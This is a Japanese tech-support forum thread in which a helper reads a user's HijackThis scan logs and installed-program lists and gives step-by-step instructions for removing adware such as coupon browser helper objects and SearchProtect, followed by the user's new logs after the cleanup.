O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10790 bytes


CC
Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
AdPunisher AdPunisher 2014/02/22
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
CutterFunc CutterFunc 2014/02/25
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DaigiCoupon "" 2015/03/24
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
Dropmark sidebar "" 2015/03/24
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 36.0.4 (x86 ja) Mozilla 2015/03/24 84.6 MB 36.0.4
Mozilla Maintenance Service Mozilla 2014/11/13 225 KB 29.0
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
SaverExxtensiion "" 2015/03/24
Skype Click to Call Microsoft Corporation 2014/12/30 10.1 MB 7.3.16540.9015
Skype(TM) 7.1 Skype Technologies S.A. 2015/03/14 48.5 MB 7.1.105
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TakeTHeCoupon "" 2015/03/24
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム･デバイス･マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす３学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないＲ Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000

以上です。

ログを拝見させていただきました。
3月24日に大量感染していますね。
Firefoxの更新日と一致しますが、私もFirefoxを更新しましたが感染していません。
もしかしたら変な場所からFirefoxをダウンロードして入れ直したのでしょうか。
そしてFirefoxそのものも旧バージョンとなっております。
今の最新バージョンは37.0.1ですので、こちらも以下の作業に従って更新しましょう。
そして駆除作業は再感染に伴いやり直しとなります。

PCをセーフモードで起動させてください。
HJTを起動させ、スキャンを行ってください。
スキャン結果が表示されましたら、以下の項目にチェックを入れてください。
ただし、特にHJTでの作業は一歩間違えれば簡単にPCが起動しなくなるため、
こちらが指示した以外のものは絶対にチェックを入れないでください。

O2 - BHO: TakeTHeCoupon - {6a6b254b-05d3-451a-9396-b7247e2e114e} - C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.dll
O2 - BHO: SaverExxtensiion - {6ec8ea13-7d70-415f-ab97-2aa8f4082c82} - C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.dll
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe

必要な項目すべてにチェックが入りましたら、Fix checkedをクリックしてください。
上記のFixが完了したら、Geek起動させ、以下を削除してください。

AdPunisher AdPunisher 2014/02/22
CutterFunc CutterFunc 2014/02/25
DaigiCoupon "" 2015/03/24
Dropmark sidebar "" 2015/03/24
SaverExxtensiion "" 2015/03/24
TakeTHeCoupon "" 2015/03/24

ダブルクリックで削除できます。
削除が完了したら自動的にスキャンが始まりますので、検出されたごみすべてにチェックを入れてOKを押してください。
Geekでのアンインストールが完了しましたらGeekを終了させ、ATFで掃除を行ってください。
Select Allにチェックを入れ、Empty Selectedをクリックします。
ATFでの掃除が完了しましたらPCを通常モードで再起動させてください。
Firefoxで以下のURLをクリックしてください。
https://www.mozilla.org/ja/firefox/new/
指示に従って更新を行ってください。
Firefoxの更新が完了しましたら、以下のURLからSkypeをダウンロードしてください。
http://www.skype.com/ja/download-skype/skype-for-computer/
そのままSkypeも最新バージョンに更新なされてください。
更新作業が完了しましたら今一度HJTとCCのログを返信欄に貼り付けていただきご連絡をお願いいたします。

返信ありがとうございます。
上記の作業を終えましたので以下にログを貼っておきます。次の指示をお願いします。

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:28:57, on 2015/04/04
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10687 bytes

CC

Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
